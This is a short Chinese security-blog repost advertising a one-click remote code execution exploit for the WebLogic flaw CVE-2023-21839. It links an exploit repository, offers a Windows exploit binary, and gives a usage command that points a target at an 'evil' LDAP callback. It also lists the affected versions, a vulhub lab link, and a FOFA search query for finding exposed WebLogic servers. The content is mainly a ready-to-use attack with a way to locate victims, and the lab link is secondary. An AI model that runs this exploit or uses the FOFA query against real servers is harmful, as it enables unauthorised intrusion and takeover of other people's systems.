【漏洞利用】Weblogic远程代码执行漏洞(CVE-2023-21839)一键RCE

admin 2023年2月28日10:58:05评论114 views字数 456阅读1分31秒阅读模式

在推送群里的应该早就看到了!

没啥发的了

简单粗暴

https://github.com/4ra1n/CVE-2023-21839

无需 Java 依赖,构造协议通过socket直接RCE

windows EXP:CVE-2023-21839.exe

后台回复CVE-2023-21839获取

CVE-2023-21839.exe -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil


vulhub地址

https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2023-21839

漏洞影响范

Weblogic 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0

FOFA Query

app="BEA-WebLogic-Server" || app="Weblogic_interface_7001"

【漏洞利用】Weblogic远程代码执行漏洞(CVE-2023-21839)一键RCE

原文始发于微信公众号(浪飒sec):【漏洞利用】Weblogic远程代码执行漏洞(CVE-2023-21839)一键RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月28日10:58:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞利用】Weblogic远程代码执行漏洞(CVE-2023-21839)一键RCEhttps://cn-sec.com/archives/1579347.html

发表评论

匿名网友 填写信息